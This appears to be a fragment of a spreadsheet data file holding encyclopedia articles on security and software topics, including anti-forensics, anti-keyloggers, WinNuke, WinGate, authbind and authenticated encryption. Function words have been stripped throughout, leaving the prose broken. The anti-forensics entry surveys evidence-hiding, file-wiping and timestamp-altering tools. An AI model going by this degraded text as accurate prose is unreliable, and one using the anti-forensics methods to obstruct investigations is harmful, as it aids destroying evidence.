978-0-321-13620-6 design implementation wlan authentication security(2010) isbn 978-3-8383-7226-6 "the evolution 802.11 wireless security" (pdf). itffroc. 2010-04-18. boyle, randall, panko, raymond. corporate computer security. upper saddle river, jersey. 2015 external links wireless security curlie secure your wireless home network wikihow</t>
  </si>
  <si>
    <t>Anti-Subversion Software</t>
  </si>
  <si>
    <t>software subversion process making software perform unintended actions either tampering program code altering behavior another fashion. example, code tampering could used change program code load malicious rules heuristics, injection form subversion purpose data corruption theft buffer overflows form subversion purpose unauthorised access. these attacks examples computer hacking. anti-subversion software detects subversion attempts stop effects hack. software applications vulnerable effects subversion throughout lifecycle development deployment, particularly operation maintenance.anti-subversion protection accomplished static dynamic manner: static anti-subversion performed construction code. code statically tested verified various attack types examining program source code. examples static anti-subversion include security auditing, code verification, fuzzing. static anti-subversion generally seen good coding practice, deemed necessary compliance regimes. however, static solutions cannot prevent types subversion attacks. dynamic anti-subversion performed code execution. code dynamically protected subversion continuously checking unintended program behaviours. examples dynamic anti-subversion include application firewalls, security wrappers, protection embedded software.software applications running desktops, corporate servers, mobile devices embedded devices risk subversion. references</t>
  </si>
  <si>
    <t>Anti-computer forensics</t>
  </si>
  <si>
    <t>anti-computer forensics counter-forensics techniques used obstruct forensic analysis. definition anti-forensics recently recognized legitimate field study. within field study, numerous definitions anti-forensics abound. widely known accepted definitions comes marc rogers purdue university. rogers uses traditional "crime scene" approach defining anti-forensics. "attempts negatively affect existence, amount and/or quality evidence crime scene, make analysis examination evidence difficult impossible conduct." earliest detailed presentations anti-forensics, phrack magazine 2002, defines anti-forensics "the removal, hiding, evidence attempt mitigate effectiveness forensics investigation".a abbreviated definition given scott berinato article entitled, rise anti-forensics. "anti-forensics technology. approach criminal hacking summed like this: make hard find impossible prove found you." neither author takes account using anti-forensics methods ensure privacy one's personal data. sub-categories anti-forensics methods often broken several sub-categories make classification various tools techniques simpler. widely accepted subcategory breakdowns developed marcus rogers. proposed following sub-categories: data hiding, artifact wiping, trail obfuscation attacks (computer forensics) processes tools. attacks forensics tools directly also called counter-forensics. purpose goals within field digital forensics much debate purpose goals anti-forensic methods. common conception anti-forensic tools purely malicious intent design. others believe tools used illustrate deficiencies digital forensic procedures, digital forensic tools, forensic examiner education. this sentiment echoed 2005 blackhat conference anti-forensic tool authors, james foster vinnie liu. they stated exposing issues, forensic investigators work harder prove collected evidence accurate dependable. they believe result better tools education forensic examiner. also, counter-forensics significance defence espionage, recovering information forensic tools serves goals spies equally well investigators. data hiding data hiding process making data difficult find also keeping accessible future use. "obfuscation encryption data give adversary ability limit identification collection evidence investigators allowing access themselves."some common forms data hiding include encryption, steganography various forms hardware/software based data concealment. each different data hiding methods makes digital forensic examinations difficult. when different data hiding methods combined, make successful forensic investigation nearly impossible. encryption commonly used techniques defeat computer forensics data encryption. presentation gave encryption anti-forensic methodologies vice president secure computing, paul henry, referred encryption "forensic expert's nightmare".the majority publicly available encryption programs allow user create virtual encrypted disks opened designated key. through modern encryption algorithms various encryption techniques programs make data virtually impossible read without designated key. file level encryption encrypts file contents. this leaves important information file name, size timestamps unencrypted. parts content file reconstructed locations, temporary files, swap file deleted, unencrypted copies. most encryption programs ability perform number additional functions make digital forensic efforts increasingly difficult. some functions include keyfile, full-volume encryption, plausible deniability. widespread availability software containing functions field digital forensics great disadvantage. steganography steganography technique information files hidden within another file attempt hide data leaving plain sight. "steganography produces dark data typically buried within light data (e.g., non-perceptible digital watermark buried within digital photograph)." some experts argued steganography techniques widespread therefore given thought. most experts agree steganography capability disrupting forensic process used correctly.according jeffrey carr, 2007 edition technical mujahid bi-monthly terrorist publication) outlined importance using steganography program called secrets mujahideen. according carr, program touted giving user capability avoid detection current steganalysis programs. steganography conjunction file compression. other forms data hiding other forms data hiding involve tools techniques hide data throughout various locations computer system. some places include "memory, slack space, hidden directories, blocks, alternate data streams, (and) hidden partitions."one well known tools often used data hiding called slacker (part metasploit framework). slacker breaks file places piece file slack space files, thereby hiding forensic examination software. another data hiding technique involves sectors. perform technique, user changes particular sector good data placed onto particular cluster. belief forensic examination tools clusters continue without examination contents. artifact wiping methods used artifact wiping tasked permanently eliminating particular files entire file systems. this accomplished variety methods include disk cleaning utilities, file wiping utilities disk degaussing/destruction techniques. disk cleaning utilities disk cleaning utilities variety methods overwrite existing data disks (see data remanence). effectiveness disk cleaning utilities anti-forensic tools often challenged believe completely effective. experts believe disk cleaning utilities acceptable disk sanitization base opinions current policy, states acceptable form sanitization degaussing. (see national industrial security program.) disk cleaning utilities also criticized leave signatures file system wiped, cases unacceptable. some widely used disk cleaning utilities include dban, srm, bcwipe total wipeout, killdisk, inspector cyberscrubs cybercide. another option approved nist cmrr secure erase, uses secure erase command built specification. file wiping utilities file wiping utilities used delete individual files operating system. advantage file wiping utilities accomplish task relatively short amount time opposed disk cleaning utilities take much longer. another advantage file wiping utilities generally leave much smaller signature disk cleaning utilities. there primary disadvantages file wiping utilities, first require user involvement process second experts believe file wiping programs always correctly completely wipe file information. some widely used file wiping utilities include bcwipe, r-wipe clean, eraser, aevita wipe delete cyberscrubs privacysuite. linux tools like shred also used wipe single files. ssds design difficult wipe, since firmware write cells therefore allowing data recovery. instances secure erase used whole drive, tools like hdparm support disk degaussing destruction techniques disk degaussing process magnetic field applied digital media device. result device entirely clean previously stored data. degaussing rarely used anti-forensic method despite fact effective means ensure data wiped. this attributed high cost degaussing machines, difficult average consumer afford. commonly used technique ensure data wiping physical destruction device. nist recommends "physical destruction accomplished using variety methods, including disintegration, incineration, pulverizing, shredding melting." trail obfuscation purpose trail obfuscation confuse, disorient, divert forensic examination process. trail obfuscation covers variety techniques tools include "log cleaners, spoofing, misinformation, backbone hopping, zombied accounts, trojan commands."one widely known trail obfuscation tools timestomp (part metasploit framework). timestomp gives user ability modify file metadata pertaining access, creation modification times/dates. using programs timestomp, user render number files useless legal setting directly calling question files' credibility.another well known trail-obfuscation program transmogrify (also part metasploit framework). file types header file contains identifying information. (.jpg) would header information identifies (.jpg), (.doc) would information identifies (.doc) transmogrify allows user change header information file, (.jpg) header could changed (.doc) header. forensic examination program operating system conduct search images machine, would simply (.doc) file skip attacks computer forensics past anti-forensic tools focused attacking forensic process destroying data, hiding data, altering data usage information. anti-forensics recently moved realm tools techniques focused attacking forensic tools perform examinations. these anti-forensic methods benefited number factors include well documented forensic examination procedures, widely known forensic tool vulnerabilities, digital forensic examiners' heavy reliance tools.during typical forensic examination, examiner would create image computer's disks. this keeps original computer (evidence) tainted forensic tools. hashes created forensic examination software verify integrity image. recent anti-tool techniques targets integrity hash created verify image. affecting integrity hash, evidence collected subsequent investigation challenged. physical prevent physical access data computer powered (from grab-and-go theft instance, well seizure enforcement), different solutions could implemented: software frameworks like usbguard usbkill implements authorization policies method policies. software triggered, insertion removal devices, specific action performed. after arrest silk road's administrator ross ulbricht, number proof concept anti-forensic tools created detect seizing computer owner shut down, therefore making data inaccessible full disk encryption used. hardware cable anchors using kensington security slot prevent stealing opportunistic thieves. hardware kill cables lock, shutdown, wipe data ejected chassis intrusion detection feature computer case sensor (such photodetector) rigged explosives self-destruction. jurisdictions method could illegal since could seriously maim kill unauthorized user could consist destruction evidence. battery could removed laptop make work attached power supply unit. cable removed, shutdown computer occur immediately causing data loss. event power surge occur though.some methods rely shutting computer down, data might retained couple seconds couple minutes, theoretically allowing cold boot attack. cryogenically freezing might extend time even attacks wild spotted. methods counteract attack exist overwrite memory shutting down. some anti-forensic tools even detect temperature perform shutdown certain threshold.attempts create tamper-resistant desktop computer made 2020, orwl model best examples). however, security particular model debated security researcher qubes founder joanna rutkowska. effectiveness anti-forensics anti-forensic methods rely several weaknesses forensic process including: human element, dependency tools, physical/logical limitations computers. reducing forensic process's susceptibility weaknesses, examiner reduce likelihood anti-forensic methods successfully impacting investigation. this accomplished providing increased training investigators, corroborating results using multiple tools. also cryptographic hash function data remanence decaf degauss encryption forensic disk controller information privacy keyfile metadata removal tool plausible deniability tails (operating system) notes references external links evaluating commercial counter-forensic tools wayback machine (archived 2014-12-30) counter-forensic tools: analysis data recovery refereed proceedings annual digital forensic research workshop, dfrws 2005 dblp arriving anti-forensics consensus: examining define control anti-forensics problem wayback machine (archived 2012-03-14) doi:10.1016/j.diin.2006.06.005 anti-forensics class little video subject anti-forensic techniques</t>
  </si>
  <si>
    <t>Anti-hijack system</t>
  </si>
  <si>
    <t>anti-hijack system electronic system fitted motor vehicles deter criminals hijacking them. although types systems becoming common newer cars, caused decrease insurance premiums widely known common anti-theft systems alarms steering locks. also part alarm immobiliser system. approved anti-hijacking system achieve safe, quick shutdown vehicle attached there also mechanical anti-hijack devices. diversify solutions, company south africa, announced research development nelson mandela university based anti hijacking system. system works verification process added features alcohol sensors signal jamming capabilities, comes increasing rates hijackings south africa alarming rates accidents caused driving influence texting whilst driving. technology there three basic principles systems work. lockout lockout system armed driver turns ignition position carries specified action, usually flicking hidden switch depressing brake pedal twice. activated vehicle drops certain speed becomes stationary, cause vehicles doors automatically lock, prevent thieves stealing vehicle stopped, example traffic light pedestrian crossing. transponder transponder system system always armed device, usually small rfid transponder, enters vehicle's transmitter radius. since device carried driver, usually wallet pocket, driver leaves immediate vicinity vehicle, transponder, causing system assume vehicle hijacked disable transponder concealed, thief would aware system active vehicle ejected driver moved vehicle range driver (usually couple meters). this probably common anti-hijack system, central locking system uses concept demonstrated jeremy clarkson episode gear program teased butler asking bags mercedes-benz s600 give rfid transponder. butler confused s600 doors open tried, jeremy approached transponder pocket, system acknowledged unlocked car, allowing jeremy simply pull door handle gain entry vehicle. microswitch microswitch system always armed usually activated vehicle doors opened closed vehicle's engine running. once system activated, driver time limit disarm entering code vehicle takes measures. system disarmed time window, warn driver sounding vehicle's horn every seconds seconds, point system start sounding horn much shorter intervals usually activate vehicle's hazard lights. point immobiliser circuit also start rapidly pulsing seconds, completely disabling engine eventually bringing vehicle stop. thief switches ignition position back position again, horn restart operate constantly hazard lights flash seconds. immobiliser circuit close seconds rapidly pulse seconds re-opening circuit, allowing vehicle driven safe location immobilised. hazard lights continue flash, every subsequent attempt start vehicle cause horn operate seconds, immobilizer circuit open, vehicle start hazard lights keep flashing vehicle's battery drained system disarmed. mechanical anti-hijack devices blocks steering shaft rotation prevent rotation steering wheel. when mechanical anti-hijack device wheels turn travel straight forward backward. side back forth, installing mechanical anti-hijack device lock wheels turn. established mechanical anti-hijack device possible. also immobilisers alarms vehicle tracking systems blaster (flamethrower) references external links information photo, mechanicals anti-hijack devices cars</t>
  </si>
  <si>
    <t>Anti-keylogger</t>
  </si>
  <si>
    <t>anti-keylogger anti–keystroke logger) type software specifically designed detection keystroke logger software; often, software also incorporate ability delete least immobilize hidden keystroke logger software computer. comparison anti-virus anti-spyware software, primary difference anti-keylogger make distinction legitimate keystroke-logging program illegitimate keystroke-logging program (such malware); keystroke-logging programs flagged optionally removed, whether appear legitimate keystroke-logging software not. anti-keylogger efficient managing malicious users. detect keyloggers terminate system. anti-keyloggers keyloggers sometimes part malware packages downloaded onto computers without owners' knowledge. detecting presence keylogger computer difficult. so-called anti- keylogging programs developed thwart keylogging systems, often effective used properly. anti-keyloggers used large organizations well individuals order scan remove cases simply immobilize) keystroke logging software computer. generally advised software developers anti-keylogging scans regular basis order reduce amount time keylogger record keystrokes. example, system scanned every three days, maximum three days keylogger could hidden system recording keystrokes. public computers public computers extremely susceptible installation keystroke logging software hardware, documented instances occurring. public computers particularly susceptible keyloggers number people gain access machine install hardware keylogger software keylogger, either secretly installed matter minutes. anti-keyloggers often used daily basis ensure public computers infected keyloggers, safe public use. gaming usage keyloggers prevalent online gaming industry, used secretly record gamer's access credentials, user name password, logging account; information sent back hacker. hacker sign later account change password account, thus stealing world warcraft particular importance game hackers target numerous keylogging viruses. anti-keyloggers used many world warcraft gaming community members order keep gaming accounts secure. financial institutions financial institutions become target keyloggers, particularly institutions advanced security features pads screen keyboards. anti-keyloggers used regular scans computer banking client information accessed, protecting passwords, banking information, credit card numbers identity thieves. personal common anti-keylogger individuals wishing protect privacy using computer; uses range protecting financial information used online banking, passwords, personal communication, virtually information typed computer. keyloggers often installed people known computer's owner, many times installed ex-partner hoping ex-partner's activities, particularly chat. types signature-based this type software signature base, strategic information helps uniquely identify keylogger, list contains many known keyloggers possible. some vendors make effort availability up-to-date listing download customers. each time 'system scan' run, software compares contents hard disk drive, item item, list, looking matches. this type software rather widespread one, drawbacks biggest drawback signature-based anti-keyloggers protected keyloggers found signature-base list, thus staying vulnerable unknown unrecognized keyloggers. criminal download many famous keyloggers, change enough, anti-keylogger recognize heuristic analysis this software signature bases, uses checklist known features, attributes, methods keyloggers known use. analyzes methods work modules thus blocking activity module similar work keyloggers. though method gives better keylogging protection signature-based anti-keyloggers, drawbacks. type software blocks non-keyloggers also. several 'non-harmful' software modules, either part operating system part legitimate apps, processes keyloggers also use, trigger false positive. usually signature-based keyloggers option allow user unblock selected modules, cause difficulties inexperienced users unable discern good modules modules manually choosing block unblock. also keystroke logger hardware keylogger references</t>
  </si>
  <si>
    <t>Workload Partitions</t>
  </si>
  <si>
    <t>workload partitions (wpars) software implementation operating system-level virtualization technology introduced ibm's operating system provides application environment isolation resource control. wpars software partitions created from, share resources single instance wpars created power systems system hardware supports higher versions. there three kinds wpars: system wpars; application wpars; versioned wpars. system wpar system wpar behaves complete installation aix. application wpar application wpars lightweight environments used isolating executing single application process. versioned wpar wpar contains instance either 5.3. versioned wpars supported later lpars. mobility wpar mobility extension wpars provides ability move running workload physical machine another. both system application wpars moved machine another. continue access files before/after mobility; filesystems mobile wpar must either stored disk mounted (both shared accessible machines wpar moved to). feature helpful following scenarios during hardware upgrades planned outages. transfer load running application another machine. also operating system-level virtualization logical partitioning (lpar) dynamic logical partitioning (dlpar) freebsd jail solaris containers openvz linux-vserver external links basic management workload partitions aix, developerworks workload partitioning (wpar) 6.1, developerworks wpar</t>
  </si>
  <si>
    <t>Windows Server Update Services</t>
  </si>
  <si>
    <t>windows server update services (wsus), previously known software update services (sus), computer program network service developed microsoft corporation enables administrators manage distribution updates hotfixes released microsoft products computers corporate environment. wsus downloads updates microsoft update website distributes computers network. wsus integral component windows server. history first version wsus known software update services (sus). first, delivered hotfixes patches microsoft operating systems. windows server operating system downloaded updates specified versions windows remote windows update site operated microsoft. clients could download updates internal server, rather connecting directly windows update. support microsoft originally planned december 2006, based user feedback, date extended july 2007.wsus builds expanding range software update. wsus infrastructure allows automatic downloads updates, hotfixes, service packs, device drivers feature packs clients organization central server servers. operation windows server update services operate repository update packages microsoft. allows administrators approve decline updates release, force updates install given date, produce extensive reports updates machine requires. system administrators also configure wsus approve certain classes updates automatically (critical updates, security updates, service packs, drivers, etc.). also approve updates detection only, allowing administrator machines require given update without also installing update. wsus used update computers disconnected network. this requires exporting patch data wsus server connected internet and, using removable media, importing wsus server disconnected network.administrators wsus group policy client-side configuration automatic updates client, ensuring end-users can't disable circumvent corporate update policies. wsus require active directory; client configuration also applied local group policy modifying windows registry. wsus uses .net framework, microsoft management console internet information services. wsus uses either server express windows internal database database engine, whereas wsus uses wmsde. system center configuration manager (sccm) interoperates wsus import third party security updates product. licensing wsus feature windows server product therefore requires valid windows server license machine hosting service. fact user workstations authenticate wsus service retrieve updates makes necessary acquire fileserver client access license (cal) workstation connecting wsus service. fileserver wsus required connecting microsoft active directory, fileserver printserver, acquired device user. wsus often considered free product fileserver already paid enterprise network microsoft active directory thus need acquired again.in network using samba active directory, necessary purchase cals connect domain controller connect samba file server. however, wsus server still require purchase client access licenses windows workstations connect wsus server. version history references external links official website microsoft docs wsus product team blog</t>
  </si>
  <si>
    <t>Areca Backup</t>
  </si>
  <si>
    <t>areca backup open source personal file backup software developed java. released general public license (gpl) features areca backup includes backup engine, well graphical user interface command-line interface. application includes following features: zip/zip64 compression encryption backup filters extension, subdirectory, regular expression, size, date, status, usage) incremental backup, differential full backup support delta backup (only modified parts files stored, whole files) archives merges date recovery transaction mechanism (with commit/rollback management) critical processes (such backups merges) guarantee backups' integrity unix file permissions backup/recovery e-mail reports backup simulation ftps support (ssl/tls implicit explicit modes) sftp support (with password certificate authentication)areca also provides tools needed handle archives: backup archive recovery (with without deleted files); entire archives single files easily recovered archive merge: contiguous incremental archives merged single archive save storage space archive deletion history explorer: different versions given file browsed restored archive explorer: files searched among archivesstorage modes areca handle multiple storage modes: standard: default mode, recommended users: choose storage mode, archive created backup. modified files since last backup stored archive. delta: this mode recommended advanced users only: choose storage mode, archive created backup. modified *parts* files since last backup stored archive. this mode particularly useful handling large files. image: choose storage mode, unique archive created updated backup.backup types areca handle following types backups: full backup: when full backup performed, files stored archive (whether modified not). incremental backup: when incremental backup performed, files modified since last backup stored archive. differential backup: when differential backup performed, files modified since last full backup stored archive.areca uses file's size last modification time detect modified files. attributes modified (whatever value is), file flagged modified. this allows fast detection modified files. areca downloadable pre-packaged linux windows 2000/windows windows vista. also runs operating system, provided java runtime environment installed (version 1.4.2 later). translated chinese (simplified), chinese (traditional), czech, danish, dutch, english, french, german, hungarian, italian, japanese, russian, spanish, swedish. limitations areca backup built method handling automated backup creation windows-based operating systems. user required configure backup strategy using included wizard, consequently creates collection files required manually added windows task scheduler. areca backup support (volume shadow copy service) cannot backup files locked programs, plugins areca (like arecavss) references external links areca backup official website</t>
  </si>
  <si>
    <t>Windows Mobile Device Center</t>
  </si>
  <si>
    <t>windows mobile device center synchronization software program developed microsoft, successor activesync. designed synchronize various content including music, video, contacts, calendar events, browser favorites, files windows mobile devices microsoft windows operating system. history windows mobile device center written successor activesync program previously used synchronize windows based devices windows operating systems prior windows vista. first public release available october 2006 beta version meant windows vista rc1. february 2007, first official release made available download, june 2007, windows mobile device center updated work windows mobile operating system. with release windows mobile device center, pocket 2000 pocket 2002 operating systems effectively phased full native support windows vista. however, basic connectivity became available devices version release. other versions windows, windows server 2008 windows server 2008 also wmdc enabled. features while windows vista base driver built-in interface windows mobile devices windows explorer, windows mobile device center offers front-end users integrate data multiple windows applications. base driver windows vista allows browsing device, copying files syncing windows media player. complete functionality including synchronization tasks, calendar data, contacts, email etc. microsoft office outlook, windows mobile device center needs downloaded, includes additional drivers well. synchronization windows mail, windows calendar, windows contacts, outlook express, outlook 2010 version outlook prior outlook 2003 supported. whenever windows mobile device connected, mobile device center pane pops giving options manage media files device, well control settings. ways interface windows mobile devices windows mobile device center include bluetooth, usb, legacy purposes, serial. however, synchronizing serial port activated default, required user alters windows registry so.visual studio 2005 2008 came remote tools, could used edit registry tethered mobile device, view running processes. these remote tools utilised activesync service, part windows mobile device center windows mobile device center ability synchronize following: information microsoft outlook 2003 later photos windows photo gallery videos windows media player music windows media player tasks calendar events, synced microsoft outlook 2007 favorites internet explorer folders/general files windows explorer onenote notes taken onenote mobile windows mobile programs version updates major version releases windows mobile device center beta released october 2006. (first public release) windows mobile device center 6.0, released february 2007. (first official release, outlook 2002 supported.) windows mobile device center 6.1, released june 2007. (added support windows mobile devices, added windows support, removed outlook 2002 support.) also activesync features windows vista pocket syncml zune software windows mobile windows mobility center references external links https://docs.microsoft.com/en-us/troubleshoot/windows/win32/description-of-windows-mobile-device-center windows mobile device center (archived july 2008)</t>
  </si>
  <si>
    <t>WinNuke</t>
  </si>
  <si>
    <t>computer security, winnuke example nuke remote denial-of-service attack (dos) affected microsoft windows microsoft windows microsoft windows 3.1x computer operating systems. exploit sent string out-of-band data (oob data) target computer port (netbios), causing lock display blue screen death. this damage change data computer's hard disk, unsaved data would lost. details so-called simply means malicious packet contained urgent pointer (urg). "urgent pointer" rarely used field header, used indicate data stream processed quickly recipient. affected operating systems handle urgent pointer field correctly. person screen-name "_eci" published source code exploit 1997. with source code widely used distributed, microsoft forced create security patches, released weeks later. time, numerous flavors exploit appeared going names fedup, gimp, killme, killwin, knewkem, liquidnuke, mnuke, netnuke, muerte, nuke, nukeattack, nuker102, pnewq, project1, pstlince, simportnuke, sprite, sprite32, vconnect, vzmnuker, wingenocide, winnukeit, winnuker02, winnukev95, wnuke3269, wnuke4, wnuke95. company called semisoft solutions zealand created small program, called antinuke, blocks winnuke without install official patch.years later, second incarnation winnuke uses another, similar exploit found. also ping death references external links winnuke relief page</t>
  </si>
  <si>
    <t>WinGate</t>
  </si>
  <si>
    <t>wingate integrated multi-protocol proxy server, email server internet gateway qbik zealand limited auckland. first released october 1995, began re-write socketset, product previously released prototype form adrien croy. wingate proved popular, mid- late 1990s, wingate used homes small businesses needed share single internet connection multiple networked computers. introduction internet connection sharing windows combined increasing availability cheap nat-enabled routers, forced wingate evolve provide internet connection sharing features. today, focus wingate primarily access control, email server, caching, reporting, bandwidth management content filtering. wingate comes three versions, standard, professional enterprise. enterprise edition also provides easily configured virtual private network system, also available separately wingate vpn. licensing based number concurrently connected users, range license sizes available. multiple licenses also aggregated. current version wingate version 9.4.1, released february 2020. notoriety versions wingate prior 2.1d (1997) shipped insecure default configuration secured network administrator allowed untrusted third parties proxy network traffic wingate server. this made open wingate servers common targets crackers looking anonymous redirectors attack systems. while wingate means exploited proxy server, wide popularity amongst users little experience administering networks made almost synonymous open socks proxies late 1990s. furthermore, since restricted (two users) version product freely available without registration, contacting wingate users notify security issues impossible, therefore even long security problems resolved still many insecure installations use. some versions sobig worm installed unlicensed copy wingate deliberately insecure configuration used spammers. these installations used non-standard ports socks wingate remote control general interfere software running infected host computer. this resulted antivirus software incorrectly identifying wingate malware removing version history also internet security references external links wingate proxy server official site wingate proxy server italy</t>
  </si>
  <si>
    <t>Authbind</t>
  </si>
  <si>
    <t>authbind open-source system utility written jackson distributed general public license. authbind software allows program would normally require superuser privileges access privileged network services non-privileged user. authbind allows system administrator permit specific users groups access bind ports 1024. ports 1023 normally privileged reserved programs root user. allowing regular users limited access privileged ports helps prevent possible privilege escalation system compromise software happens contain software bugs found vulnerable unknown exploits. authbind achieves defining ld_preload environment variable loads libauthbind library. this library overrides bind() call version executes setuid helper program (/usr/lib/authbind/helper) socket file descriptor helper validates arguments checks configuration, calls real bind() system call file descriptor (which also affects original process's socket), exits, allowing original process continue socket bound requested address port. authbind currently distributed debian ubuntu linux distributions. alternatives linux kernel's implementation posix capabilities includes cap_net_bind_service allows either explicitly enabled binaries (with "setcap cap_net_bind_service+ep /path/to/binary") binaries configured accept capability invoking user's capability ("setcap cap_net_bind_service+ei /path/to/binary") available, making userland software unnecessary binding lower numeral ports. linux capabilities, however introduced latter half 1999, year authbind's release, (similar setuid/setgid) cannot scripts. both explain software initially developed. also chroot operating system-level virtualization freebsd jail sysjail solaris containers lomac references external links debian authbind packages ubuntu authbind packages</t>
  </si>
  <si>
    <t>Authenticated encryption</t>
  </si>
  <si>
    <t>authenticated encryption (ae) authenticated encryption associated data (aead) forms encryption simultaneously assure confidentiality authenticity data. programming interface typical programming interface implementation provides following functions: encryption input: plaintext, key, optionally header plaintext encrypted, covered authenticity protection. output: ciphertext authentication (message authentication code mac). decryption input: ciphertext, key, authentication tag, optionally header used encryption). output: plaintext, error authentication match supplied ciphertext header.the header part intended provide authenticity integrity protection networking storage metadata confidentiality unnecessary, authenticity desired. history need authenticated encryption emerged observation securely combining separate confidentiality authentication block cipher operation modes could error prone difficult. this confirmed number practical attacks introduced production protocols applications incorrect implementation, lack authentication (including ssl/tls).around year 2000, number efforts evolved around notion standardizing modes ensured correct implementation. particular, strong interest possibly secure modes sparked publication charanjit jutla's integrity-aware integrity-aware parallelizable, iapm, modes 2000 (see chronology). different authenticated encryption modes (namely offset codebook mode 2.0, 2.0; wrap; counter cbc-mac, ccm; encrypt authenticate translate, eax; encrypt-then-mac, etm; galois/counter mode, gcm) standardized iso/iec 19772:2009. more authenticated encryption methods developed response nist solicitation. sponge functions used duplex mode provide authenticated encryption.bellare namprempre (2000) analyzed three compositions encryption primitives, demonstrated encrypting message subsequently applying ciphertext (the encrypt-then-mac approach) implies security adaptive chosen ciphertext attack, provided functions meet minimum required properties. katz yung investigated notion name "unforgeable encryption" proved implies security chosen ciphertext attacks.in 2013, caesar competition announced encourage design authenticated encryption modes.in 2015, chacha20-poly1305 added alternative construction ietf protocols. authenticated encryption associated data (aead) aead variant allows recipient check integrity encrypted unencrypted information message. aead binds associated data (ad) ciphertext context supposed appear attempts "cut-and-paste" valid ciphertext different context detected rejected. required, example, network packets frames header needs visibility, payload needs confidentiality, need integrity authenticity. approaches authenticated encryption encrypt-then-mac (etm) plaintext first encrypted, produced based resulting ciphertext. ciphertext sent together. used e.g., ipsec. standard method according iso/iec 19772:2009. this method reach highest definition security achieved used "strongly unforgeable". november 2014, dtls extension published 7366. various ciphersuites exist sshv2 well (e.g., hmac-sha1-etm@openssh.com). note separation mandatory (distinct keys must used encryption keyed hash), otherwise potentially insecure depending specific encryption method hash function used. encrypt-and-mac (e&amp;m) produced based plaintext, plaintext encrypted without mac. plaintext's ciphertext sent together. used e.g., ssh. even though approach proved strongly unforgeable itself, possible apply minor modifications make strongly unforgeable despite approach. mac-then-encrypt (mte) produced based plaintext, plaintext together encrypted produce ciphertext based both. ciphertext (containing encrypted mac) sent. aead used ssl/tls. even though approach proven strongly unforgeable itself, ssl/tls implementation proven strongly unforgeable krawczyk showed ssl/tls was, fact, secure encoding used alongside mechanism. despite theoretical security, deeper analysis ssl/tls modeled protection mac-then-pad-then-encrypt, i.e. plaintext first padded block size encryption function. padding errors often result detectable errors recipient's side, turn lead padding oracle attacks, lucky thirteen. also block cipher mode operation mode mode mode mode gcm-siv chacha20-poly1305 sgcm signcryption references generalbellare, namprempre, (2000), okamoto (ed.), "authenticated encryption: relations among notions analysis generic composition paradigm" (pdf), extended abstract advances cryptology: asiacrypt 2000 proceedings, lecture notes computer science, springer-verlag, 1976: 531, doi:10.1007/3-540-44448-3_41, isbn 978-3-540-41404-9 external links nist: modes development choose authenticated encryption mode</t>
  </si>
  <si>
    <t>WinAce</t>
  </si>
  <si>
    <t>winace legacy archiving windows. works primarily eponymous archive format supports zip, cab. free, developer also developed freeware, called unace macos linux extracts archive files. beginning version 2.65, winace bundled whenu savenow adware program. this bundle removed last version (2.69) replaced opt-in sponsorship deal trialpay. since discontinued. there third operating system, called commandline ace. title, however, misnomer sports text-based user interface (tui) emulates color theme norton commander. addition format, supports arj, rar, zip, (partial) archive formats. commandline ships copy unace. both apps support dos, os/2 windows operating systems, recognize long filenames. commandline could used file management. also comparison file archivers external links official website archive snapshot 14.07.2017 english) download link last version 2.69i archive snapshot 21.01.2011</t>
  </si>
  <si>
    <t>Win4Lin</t>
  </si>
  <si>
    <t>win4lin discontinued proprietary software application linux allowed users copy windows windows 2000 windows applications linux desktop. win4lin based merge software, product changed owners several times bought win4lin inc. citing changes desktop virtualization industry, software's publisher, virtual bridges, discontinued win4lin pro. products technology 2006, win4lin came three different versions, depending virtualization requirements user. win4lin allowed user full copy windows windows inside virtual machine. win4lin home allowed users emulate applications. win4lin offered users ability install fully virtualized windows 2000 windows xp.the win4lin 9x/pro (henceforth technology discussed section) operates running windows applications virtual machine. unlike wine crossover emulation-based, virtualization-based software vmware win4lin require users windows license order applications since must install full copy windows within virtual machine.unlike vmware, however, win4lin provides virtual guest operating system access native linux filesystem, allows linux host access guest's files even virtual machine running. addition convenience offers, computerworld found 2002 review win4lin gained significant performance vmware using native linux filesystem, also noted approach (unlike vmware's) limited installation version windows win4lin machine.when win4lin application starts displays window linux desktop contains windows desktop environment. users install applications normally would within windows. win4lin supports linux printers, internet connections, windows networking, 2000, support directx extension windows games.they also offered win4bsd freebsd. history win4lin initially based merge software originally developed locus computing corporation, changed hands several times ended assets netraverse, purchased 2005 win4lin inc., introduced win4lin desktop. this based 'tuned' version qemu kqemu, hosted [windows nt]-versions windows. june 2006, win4lin released win4vdi linux based code base. win4vdi linux served microsoft windows desktops thin clients linux server. virtual bridges discontinued support win4lin 2007. win4lin desktop product ceased supported march 2010. reception many users reported version windows software near-native speed, even quite low-powered machines, pentium-iis.nicholas petereley praised win4lin columns year 2000, significantly faster performance competitor vmware. also virtualization references external links win4lin makes improvements, linux.com, 2008 win4lin desktop lags behind free alternatives, linux.com, 2007 break hardware upgrade cycle win4lin windows virtual desktop server, linux journal, 2007 windows linux: win4lin revisited [win4lin review], tom's hardware, 2006 inquirer helps debug win4lin [2.7], inquirer, 2006 product review running windows linux, win4lin vmware workstation 5.5.1., open source magazine, 2006 review: win4lin [2.0], linux.com, 2005 look win4lin 5.1, osnews, 2004 review win4lin 4.0, osnews, 2002 vmware express win4lin 2.0: comparison review, linux journal, 2001 trelos's win4lin (2000)</t>
  </si>
  <si>
    <t>AutoPatcher</t>
  </si>
  <si>
    <t>autopatcher offline updater alternative microsoft update used installing software patches, service packs updates certain microsoft windows systems. allows downloaded different machine advance, installed without internet connection. this, system updates automated scripted, time bandwidth required download relevant updates reduced, exposure unsecured systems online avoided. autopatcher also allows installation common additional software, registry settings, patches microsoft software, notably microsoft office.autopatcher currently exists windows 2000, vista, server equivalents (windows 2003 2008). years provide support windows older systems, operating systems; updates possible 2014 version autopatcher. originally software patches distributed autopatcher but, following legal complaints software modified 2007. downloads patches local hard drive microsoft's servers (ensuring files original unmodified) allows offline before. project history version original autopatcher program simple batch script created jason kelley released october 2003. this original release contained updates could used windows sp1. upon release people asked updates, features, modern gui. jason contacted antonis kaladis rewrote autopatcher program began maintaining distributing program. versions 4.0–4.2 versions 4.0–4.2 great stepping stone batch processes next stage program. these releases .axp file format custom programs well stability. there release created series, full release contained critical, recommended component updates, commonly used applications microsystems's java platform, registry tweaks. version version 4.5, introduced march 2004, major changes previous releases. this release first time multiple release packs; full, lite, ultralite releases contained critical updates. lite release contained recommended updates extra applications ultralite release have. full release contained critical, recommended component updates, commonly used applications java, registry tweaks. version also integration database, current icon. version there three 'release types' used 5.1-era; full lite releases contained critical, recommended component updates, commonly used applications java, registry tweaks. lite release contained fewer extra applications full release. update releases 